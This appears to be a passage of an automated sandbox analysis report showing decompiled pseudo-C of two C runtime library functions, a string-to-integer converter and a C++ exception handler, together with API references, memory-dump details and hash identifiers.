                    • API String ID: 3521780317-0
                    • Opcode ID: c31208280f86fe4ea88bcf67dfbc4a712ec562fcafcadeb5e848c2026da5a72e
                    • Instruction ID: d6d50973cace414a26329c4f120845ccf474262a96aeb2299d56b6e64742e815
                    • Opcode Fuzzy Hash: c31208280f86fe4ea88bcf67dfbc4a712ec562fcafcadeb5e848c2026da5a72e
                    • Instruction Fuzzy Hash: AAF06231901700DAD731EBA9C40278E73A06B00718F11857FF454B7AE3CB7C99499A9E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E0040B45C(intOrPtr _a4, intOrPtr* _a8, signed int _a12, signed int _a16, signed int _a20) {
                    				signed int _v8;
                    				char _v12;
                    				intOrPtr _v16;
                    				char _v24;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t91;
                    				signed int _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t97;
                    				intOrPtr _t98;
                    				signed int _t100;
                    				signed int _t101;
                    				intOrPtr* _t102;
                    				signed int _t103;
                    				signed int _t105;
                    				signed int _t106;
                    				intOrPtr _t107;
                    				signed int _t108;
                    				void* _t109;
                    				void* _t110;
                    				intOrPtr* _t113;
                    				signed char _t118;
                    				signed int _t122;
                    				char _t124;
                    				signed int _t126;
                    				signed int _t129;
                    				signed int _t130;
                    				signed int _t134;
                    				signed int _t136;
                    				intOrPtr _t137;
                    				intOrPtr* _t138;
                    				intOrPtr* _t139;
                    				intOrPtr _t140;
                    				void* _t142;
                    
                    				E0040988F( &_v24, _a4);
                    				_t91 = _a12;
                    				_t139 = _a8;
                    				if(_t91 != 0) {
                    					 *_t91 = _t139;
                    				}
                    				if(_t139 != 0) {
                    					__eflags = _a16;
                    					if(_a16 == 0) {
                    						L9:
                    						_t124 = _v24;
                    						_t118 =  *_t139;
                    						_v8 = 0;
                    						_t14 = _t139 + 1; // 0x1
                    						_t136 = _t14;
                    						while(1) {
                    							__eflags =  *((intOrPtr*)(_t124 + 0xac)) - 1;
                    							if( *((intOrPtr*)(_t124 + 0xac)) <= 1) {
                    								_t132 =  *((intOrPtr*)(_t124 + 0xc8));
                    								_t94 =  *( *((intOrPtr*)(_t124 + 0xc8)) + (_t118 & 0x000000ff) * 2) & 8;
                    								__eflags = _t94;
                    							} else {
                    								_t94 = E004126F4(_t132, _t118 & 0x000000ff, 8,  &_v24);
                    								_t124 = _v24;
                    								_t142 = _t142 + 0xc;
                    							}
                    							__eflags = _t94;
                    							if(_t94 == 0) {
                    								break;
                    							}
                    							_t118 =  *_t136;
                    							_t136 = _t136 + 1;
                    						}
                    						__eflags = _t118 - 0x2d;
                    						if(_t118 != 0x2d) {
                    							__eflags = _t118 - 0x2b;
                    							if(_t118 != 0x2b) {
                    								L19:
                    								_t95 = _a16;
                    								__eflags = _t95;
                    								if(_t95 < 0) {
                    									L68:
                    									_t96 = _a12;
                    									__eflags = _t96;
                    									if(_t96 != 0) {
                    										 *_t96 = _t139;
                    									}
                    									__eflags = _v12;
                    									if(_v12 != 0) {
                    										_t98 = _v16;
                    										_t88 = _t98 + 0x70;
                    										 *_t88 =  *(_t98 + 0x70) & 0xfffffffd;
                    										__eflags =  *_t88;
                    									}
                    									_t97 = 0;
                    									__eflags = 0;
                    									L73:
                    									return _t97;
                    								}
                    								__eflags = _t95 - 1;
                    								if(_t95 == 1) {
                    									goto L68;
                    								}
                    								__eflags = _t95 - 0x24;
                    								if(_t95 > 0x24) {
                    									goto L68;
                    								}
                    								__eflags = _t95;
                    								if(_t95 != 0) {
                    									__eflags = _t95 - 0x10;
                    									if(_t95 != 0x10) {
                    										L34:
                    										_t140 =  *((intOrPtr*)(_t124 + 0xc8));
                    										_t30 = 0xffffffff % _a16;
                    										__eflags = _t30;
                    										_t100 = 0xffffffff / _a16;
                    										_t134 = _t30;
                    										while(1) {
                    											_t126 =  *(_t140 + (_t118 & 0x000000ff) * 2) & 0x0000ffff;
                    											__eflags = _t126 & 0x00000004;
                    											if((_t126 & 0x00000004) == 0) {
                    												goto L37;
                    											}
                    											_t130 = _t118 - 0x30;
                    											L41:
                    											__eflags = _t130 - _a16;
                    											if(_t130 >= _a16) {
                    												L46:
                    												_t101 = _a20;
                    												_t137 = _t136 - 1;
                    												__eflags = _t101 & 0x00000008;
                    												if((_t101 & 0x00000008) != 0) {
                    													__eflags = _t101 & 0x00000004;
                    													if((_t101 & 0x00000004) != 0) {
                    														L58:
                    														_t102 = E00407E97();
                    														__eflags = _a20 & 0x00000001;
                    														 *_t102 = 0x22;
                    														if((_a20 & 0x00000001) == 0) {
                    															__eflags = _a20 & 0x00000002;
                    															_t103 = 0;
                    															_t105 = (_t103 & 0xffffff00 | (_a20 & 0x00000002) != 0x00000000) + 0x7fffffff;
                    															__eflags = _t105;
                    															_v8 = _t105;
                    														} else {
                    															_v8 = _v8 | 0xffffffff;
                    														}
                    														L61:
                    														_t106 = _a12;
                    														__eflags = _t106;
                    														if(_t106 != 0) {
                    															 *_t106 = _t137;
                    														}
                    														__eflags = _a20 & 0x00000002;
                    														if((_a20 & 0x00000002) != 0) {
                    															_v8 =  ~_v8;
                    														}
                    														__eflags = _v12;
                    														if(_v12 != 0) {
                    															_t107 = _v16;
                    															_t82 = _t107 + 0x70;
                    															 *_t82 =  *(_t107 + 0x70) & 0xfffffffd;
                    															__eflags =  *_t82;
                    														}
                    														_t97 = _v8;
                    														goto L73;
                    													}
                    													__eflags = _t101 & 0x00000001;
                    													if((_t101 & 0x00000001) != 0) {
                    														goto L61;
                    													}
                    													_t108 = _t101 & 0x00000002;
                    													__eflags = _t108;
                    													if(_t108 == 0) {
                    														L56:
                    														__eflags = _t108;
                    														if(_t108 != 0) {
                    															goto L61;
                    														}
                    														__eflags = _v8 - 0x7fffffff;
                    														if(_v8 <= 0x7fffffff) {
                    															goto L61;
                    														}
                    														goto L58;
                    													}
                    													__eflags = _v8 - 0x80000000;
                    													if(_v8 > 0x80000000) {
                    														goto L58;
                    													}
                    													goto L56;
                    												}
                    												__eflags = _a12;
                    												if(_a12 != 0) {
                    													_t137 = _a8;
                    												}
                    												_v8 = _v8 & 0x00000000;
                    												goto L61;
                    											}
                    											_a20 = _a20 | 0x00000008;
                    											__eflags = _v8 - _t100;
                    											if(__eflags < 0) {
                    												L50:
                    												_t122 = _v8 * _a16 + _t130;
                    												__eflags = _t122;
                    												_v8 = _t122;
                    												L51:
                    												_t118 =  *_t136;
                    												_t136 = _t136 + 1;
                    												continue;
                    											}
                    											if(__eflags != 0) {
                    												L45:
                    												_a20 = _a20 | 0x00000004;
                    												__eflags = _a12;
                    												if(_a12 != 0) {
                    													goto L51;
                    												}
                    												goto L46;
                    											}
                    											__eflags = _t130 - _t134;
                    											if(_t130 <= _t134) {
                    												goto L50;
                    											}
                    											goto L45;
                    											L37:
                    											__eflags = _t126 & 0x00000103;
                    											if((_t126 & 0x00000103) == 0) {
                    												goto L46;
                    											}
                    											__eflags = _t118 - 0x61 - 0x19;
                    											_t129 = _t118;
                    											if(_t118 - 0x61 <= 0x19) {
                    												_t129 = _t129 - 0x20;
                    												__eflags = _t129;
                    											}
                    											_t130 = _t129 + 0xffffffc9;
                    											__eflags = _t130;
                    											goto L41;
                    										}
                    									}
                    									__eflags = _t118 - 0x30;
                    									if(_t118 != 0x30) {
                    										goto L34;
                    									}
                    									L31:
                    									_t109 =  *_t136;
                    									__eflags = _t109 - 0x78;
                    									if(_t109 == 0x78) {
                    										L33:
                    										_t138 = _t136 + 1;
                    										_t118 =  *_t138;
                    										_t136 = _t138 + 1;
                    										__eflags = _t136;
                    										goto L34;
                    									}
                    									__eflags = _t109 - 0x58;
                    									if(_t109 != 0x58) {
                    										goto L34;
                    									}
                    									goto L33;
                    								}
                    								__eflags = _t118 - 0x30;
                    								if(_t118 == 0x30) {
                    									_t110 =  *_t136;
                    									__eflags = _t110 - 0x78;
                    									if(_t110 == 0x78) {
                    										L28:
                    										_a16 = 0x10;
                    										goto L31;
                    									}
                    									__eflags = _t110 - 0x58;
                    									if(_t110 == 0x58) {
                    										goto L28;
                    									}
                    									_a16 = 8;
                    									goto L34;
                    								}
                    								_a16 = 0xa;
                    								goto L34;
                    							}
                    							L18:
                    							_t118 =  *_t136;
                    							_t136 = _t136 + 1;
                    							__eflags = _t136;
                    							goto L19;
                    						}
                    						_a20 = _a20 | 0x00000002;
                    						goto L18;
                    					}
                    					__eflags = _a16 - 2;
                    					if(_a16 < 2) {
                    						goto L3;
                    					}
                    					__eflags = _a16 - 0x24;
                    					if(_a16 > 0x24) {
                    						goto L3;
                    					}
                    					goto L9;
                    				} else {
                    					L3:
                    					_t113 = E00407E97();
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					 *_t113 = 0x16;
                    					E00406B09(_t132, 0, _t139);
                    					if(_v12 != 0) {
                    						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
                    					}
                    					return 0;
                    				}
                    			}

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                      • Part of subcall function 0040988F: __getptd.LIBCMT ref: 004098A2
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___getptd__isctype_l
                    • String ID: $
                    • API String ID: 3484633779-3993045852
                    • Opcode ID: b055181225d9e05ad2f6405d1f8b39b84fb2feaad8181f7a1a545ce3a99edec4
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: b055181225d9e05ad2f6405d1f8b39b84fb2feaad8181f7a1a545ce3a99edec4
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E0040D36B(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                    				intOrPtr _t17;
                    				intOrPtr* _t28;
                    				void* _t29;
                    				void* _t30;
                    
                    				_t30 = __eflags;
                    				_t28 = __esi;
                    				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                    				E004079F9(__ebx, __edi,  *((intOrPtr*)(_t29 - 0x28)));
                    				 *((intOrPtr*)(E00408BF1(__ebx, __edx, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                    				_t17 = E00408BF1(__ebx, __edx, _t30);
                    				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                    				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                    					_t17 =  *((intOrPtr*)(__esi + 0x14));
                    					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                    						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                    							_t17 = E004079D2( *((intOrPtr*)(_t28 + 0x18)));
                    							_t38 = _t17;
                    							if(_t17 != 0) {
                    								_push( *((intOrPtr*)(_t29 + 0x10)));
                    								_push(_t28);
                    								return E0040D103(_t38);
                    							}
                    						}
                    					}
                    				}
                    				return _t17;
                    			}


                    APIs
                      • Part of subcall function 004079F9: __getptd.LIBCMT ref: 004079FF
                      • Part of subcall function 004079F9: __getptd.LIBCMT ref: 00407A0F
                    • __getptd.LIBCMT ref: 0040D37A
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040D388
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: c3226e5914c2fafcc7b7aa0dcbfd0320ad9f523a7d8779f82bba664e6cdc0096
                    • Instruction ID: 5255ad6bef1b04d00a052ecb8c38c34e1b8380bf0492bfbde4a4986204fe29fe
                    • Opcode Fuzzy Hash: c3226e5914c2fafcc7b7aa0dcbfd0320ad9f523a7d8779f82bba664e6cdc0096
                    • Instruction Fuzzy Hash: 03014B75C00205DACF389FA9C4816AEB7B5AF10315F54443FE841B67D2CBB8A998DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%